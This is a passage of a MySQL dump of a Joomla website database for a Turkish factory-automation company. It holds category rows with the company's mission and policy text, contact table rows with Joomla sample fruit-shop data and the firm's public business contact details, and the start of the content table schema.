2px; padding: 2px; font-size: 1em;\">Yeniliklere açığız. <br style=\"margin: 0px; padding: 0px;\" />Sürekli yenilik peşinde koşmamız gereklidir. Ciromuz büyüse bile bilgi birikimimizin büyümemesi, yeni ürünler veya teknolojide yenilik olmaması, bizim için küçülme anlamına gelir</h5>\r\n</li>\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<p> </p>\r\n</li>\r\n</ul>',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 08:08:46',0,'0000-00-00 00:00:00',0,'tr-TR',1),(83,182,81,143,144,3,'english-uk/english-content/about-us','com_content','About Us','about-us','','<h4 style=\"margin: 2px; padding: 2px; font-size: 1.1em; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; background-color: #99aadd;\"><span style=\"margin: 0px; padding: 0px; text-decoration: underline;\">Vision</span></h4>\r\n<p style=\"margin: 4px; padding: 4px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">To be the best in the field by constantly increasing level of services, know-how and quality.</p>\r\n<h4 style=\"margin: 2px; padding: 2px; font-size: 1.1em; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; background-color: #99aadd;\"><span style=\"margin: 0px; padding: 0px; text-decoration: underline;\">Mission</span></h4>\r\n<p style=\"margin: 4px; padding: 4px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">To be a reliable and long-term Complete Factory Automation Solutions Partner for our customers in Turkey and surrounding countries.</p>\r\n<h4 style=\"margin: 2px; padding: 2px; font-size: 1.1em;\"><span style=\"margin: 0px; padding: 0px; text-decoration: underline;\">Our Policies</span></h4>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Expert in our Field. <br style=\"margin: 0px; padding: 0px;\" />We strive to be experts in our field - in order to fulfill customers requirements.Â Â </h5>\r\n</li>\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Reliable. <br style=\"margin: 0px; padding: 0px;\" />Our customers know that our verbal confirmations are sufficient for us to keep our promises.Â Â Â </h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Different. <br style=\"margin: 0px; padding: 0px;\" />Even with standard products and services, we provide with differentiating factors for 3S Technologies to be the number #1 choice.Â Â </h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Immediate Action. <br style=\"margin: 0px; padding: 0px;\" />We take immediate action - both to fulfill customers requirements, as well as to take the necessary internal decisions to apply these.Â </h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Respectful. <br style=\"margin: 0px; padding: 0px;\" />Whatever the circumstances, we act with social responsibility and respect.Â Â </h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">PositiveÂ <br style=\"margin: 0px; padding: 0px;\" />We are positive about the future. When looking at the future, we focus on the opportunities and possibilities.Â Â </h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Determined and Patient <br style=\"margin: 0px; padding: 0px;\" />We are determined and patient when taking action.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Team WorkÂ <br style=\"margin: 0px; padding: 0px;\" />We understand that we can reach the target only with Teamwork. Therefore, we work strongly and closely with our suppliers and customers.</h5>\r\n</li>\r\n</ul>\r\n<p> </p>\r\n<ul style=\"margin: 10px; padding: 2px;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; text-align: left; font-size: 1em;\">Open to New Technologies and Innovation <br style=\"margin: 0px; padding: 0px;\" />We constantly pursue innovation and new technologies. This is the basis of all our activities.</h5>\r\n</li>\r\n</ul>',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 08:09:29',0,'0000-00-00 00:00:00',0,'en-GB',1),(84,188,1,147,148,1,'iletisim','com_contact','İletişim','iletisim','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 12:16:37',676,'2014-08-01 12:21:59',0,'tr-TR',1),(85,189,1,149,150,1,'contacts','com_contact','Contacts','contacts','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 12:22:15',0,'0000-00-00 00:00:00',0,'en-GB',1),(86,228,1,151,152,1,'cnc-video','com_content','CNC Video','cnc-video','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2019-09-16 16:29:02',0,'2019-09-16 16:29:02',0,'*',1);
/*!40000 ALTER TABLE `fz6t4_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_contact_details`
--

DROP TABLE IF EXISTS `fz6t4_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_contact_details` (
  `id` int NOT NULL AUTO_INCREMENT,
  `name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `con_position` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `address` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `suburb` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `state` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `postcode` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `telephone` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `fax` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `misc` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `image` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `imagepos` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `email_to` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `default_con` tinyint unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int NOT NULL DEFAULT '0',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` int NOT NULL DEFAULT '0',
  `catid` int NOT NULL DEFAULT '0',
  `access` int unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `webpage` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname1` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname2` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname3` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language` varchar(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `xreference` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int unsigned NOT NULL DEFAULT '1',
  `hits` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_contact_details`
--

LOCK TABLES `fz6t4_contact_details` WRITE;
/*!40000 ALTER TABLE `fz6t4_contact_details` DISABLE KEYS */;
INSERT INTO `fz6t4_contact_details` VALUES (1,'Contact Name Here','name','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','<p>Information about or by the contact.</p>','images/powered_by.png','top','email@example.com',1,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Twitter\",\"linka\":\"http:\\/\\/twitter.com\\/joomla\",\"linkb_name\":\"YouTube\",\"linkb\":\"http:\\/\\/www.youtube.com\\/user\\/joomla\",\"linkc_name\":\"Facebook\",\"linkc\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkd_name\":\"FriendFeed\",\"linkd\":\"http:\\/\\/friendfeed.com\\/joomla\",\"linke_name\":\"Scribed\",\"linke\":\"http:\\/\\/www.scribd.com\\/people\\/view\\/504592-joomla\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,16,1,'','','last','first','middle','en-GB','2011-01-01 00:00:01',676,'','2011-12-27 12:23:32',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,3746),(2,'Webmaster','webmaster','','','','','','','','','','',NULL,'webmaster@example.com',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,34,1,'','','','','','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,921),(3,'Owner','owner','','','','','','','','','<p>I\'m the owner of this store.</p>','',NULL,'',0,1,0,'0000-00-00 00:00:00',2,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,45),(4,'Buyer','buyer','','','','','','','','','<p>I am in charge of buying fruit. If you sell good fruit, contact me.</p>','',NULL,'',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"0\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,45),(5,'Bananas','bananas','Scientific Name: Musa','Image Credit: Enzik\r\nRights: Creative Commons Share Alike Unported 3.0\r\nSource: http://commons.wikimedia.org/wiki/File:Bananas_-_Morocco.jpg','','Type: Herbaceous','Large Producers: India, China, Brasil','','','','<p>Bananas are a great source of potassium.</p>\r\n<p> </p>','images/sampledata/fruitshop/bananas_2.jpg',NULL,'',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"show_with_link\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"1\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"1\",\"show_postcode\":\"\",\"show_country\":\"1\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Banana English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Banana\",\"linkb_name\":\"Wikipedia:  \\u0939\\u093f\\u0928\\u094d\\u0926\\u0940 \\u0915\\u0947\\u0932\\u093e\",\"linkb\":\"http:\\/\\/hi.wikipedia.org\\/wiki\\/%E0%A4%95%E0%A5%87%E0%A4%B2%E0%A4%BE\",\"linkc_name\":\"Wikipedia:Banana Portugu\\u00eas\",\"linkc\":\"http:\\/\\/pt.wikipedia.org\\/wiki\\/Banana\",\"linkd_name\":\"Wikipedia: \\u0411\\u0430\\u043d\\u0430\\u043d  \\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439\",\"linkd\":\"http:\\/\\/ru.wikipedia.org\\/\\u0411\\u0430\\u043d\\u0430\\u043d\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,39,1,'','','','','','*','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,47),(6,'Apples','apples','Scientific Name: Malus domestica','Image Credit: Fievet\r\nRights: Public Domain\r\nSource: http://commons.wikimedia.org/wiki/File:Pommes_vertes.JPG','','Family: Rosaceae','Large: Producers: China, United States','','','','<p>Apples are a versatile fruit, used for eating, cooking, and preserving.</p>\r\n<p>There are more that 7500 different kinds of apples grown around the world.</p>','images/sampledata/fruitshop/apple.jpg',NULL,'',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Apples English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Apple\",\"linkb_name\":\"Wikipedia: Manzana Espa\\u00f1ol \",\"linkb\":\"http:\\/\\/es.wikipedia.org\\/wiki\\/Manzana\",\"linkc_name\":\"Wikipedia: \\u82f9\\u679c \\u4e2d\\u6587\",\"linkc\":\"http:\\/\\/zh.wikipedia.org\\/zh\\/\\u82f9\\u679c\",\"linkd_name\":\"Wikipedia: Tofaa Kiswahili\",\"linkd\":\"http:\\/\\/sw.wikipedia.org\\/wiki\\/Tofaa\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,38,1,'','','','','','*','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,61),(7,'Tamarind','tamarind','Scientific Name: Tamarindus indica','Image Credit: Franz Eugen Köhler, Köhler\'s Medizinal-Pflanzen \r\nRights: Public Domain\r\nSource:http://commons.wikimedia.org/wiki/File:Koeh-134.jpg','','Family: Fabaceae','Large Producers: India, United States','','','','<p>Tamarinds are a versatile fruit used around the world. In its young form it is used in hot sauces; ripened it is the basis for many refreshing drinks.</p>\r\n<p> </p>','images/sampledata/fruitshop/tamarind.jpg',NULL,'',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Tamarind English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Tamarind\",\"linkb_name\":\"Wikipedia: \\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2  \\u09ac\\u09be\\u0982\\u09b2\\u09be  \",\"linkb\":\"http:\\/\\/bn.wikipedia.org\\/wiki\\/\\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \",\"linkc_name\":\"Wikipedia: Tamarinier Fran\\u00e7ais\",\"linkc\":\"http:\\/\\/fr.wikipedia.org\\/wiki\\/Tamarinier\",\"linkd_name\":\"Wikipedia:Tamaline lea faka-Tonga\",\"linkd\":\"http:\\/\\/to.wikipedia.org\\/wiki\\/Tamaline\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,57,1,'','','','','','*','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,61),(8,'Shop Address','shop-address','','','Our City','Our Province','Our Country','','555-555-5555','','<p>Here are directions for how to get to our shop.</p>','',NULL,'',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,35,1,'','','','','','*','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,52),(9,'Contact','contact','','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010','Istanbul','','Turkey','034010','+90-212-482-8446 / +90-212-482-8456','90-212-482-8424','<p style=\"text-align: left;\"><span style=\"color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; text-align: left;\">{mosmap width=\'500\'|height=\'400\'|lat=\'41.0200362\'|lon=\'28.907812\'</span><span style=\"color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; text-align: left;\">|mapType=\'Normal\'|text=\'3S Technologies\'|tooltip=\'DWO\'|</span><span style=\"color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; text-align: left;\">marker=\'1\'|align=\'center\'|zoom=\'15\' }&nbsp;</span></p>\r\n<p style=\"text-align: left;\"><span style=\"color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; text-align: left;\"><span style=\"color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 16px;\"></span></span></p>','images/logo/logo-3S.JPG',NULL,'info@3s-technologies.com.tr',0,1,0,'0000-00-00 00:00:00',3,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_tags\":\"\",\"show_info\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"add_mailto_link\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_image\":\"\",\"show_misc\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"articles_display_num\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":false,\"linkb_name\":\"\",\"linkb\":false,\"linkc_name\":\"\",\"linkc\":false,\"linkd_name\":\"\",\"linkd\":false,\"linke_name\":\"\",\"linke\":false,\"contact_layout\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,11,1,'','http://www.3s-technologies.com.tr','','','','en-GB','2014-08-01 12:21:41',676,'','2019-09-20 15:04:07',676,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',3,133881),(10,'İletişim','contact-tr','','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010','Istanbul','','Turkey','034010','(0212) 482-8446 / (0212) 482-8456','90-212-482-8424','<p>{mosmap width=\'500\'|height=\'400\'|lat=\'41.0200362\'|lon=\'28.907812\'|mapType=\'Normal\'|text=\'3S Technologies\'|tooltip=\'DWO\'|marker=\'1\'|align=\'center\'|zoom=\'15\' }</p>','images/logo/logo-3S.JPG',NULL,'info@3s-technologies.com.tr',0,1,0,'0000-00-00 00:00:00',4,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_tags\":\"\",\"show_info\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"add_mailto_link\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_image\":\"\",\"show_misc\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"articles_display_num\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":false,\"linkb_name\":\"\",\"linkb\":false,\"linkc_name\":\"\",\"linkc\":false,\"linkd_name\":\"\",\"linkd\":false,\"linke_name\":\"\",\"linke\":false,\"contact_layout\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,11,1,'','http://www.3s-technologies.com.tr','','','','tr-TR','2019-09-20 15:04:35',676,'','2019-09-20 15:33:34',676,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',7,6479);
/*!40000 ALTER TABLE `fz6t4_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_content`
--

DROP TABLE IF EXISTS `fz6t4_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_content` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `introtext` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `fulltext` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint NOT NULL DEFAULT '0',
  `catid` int unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
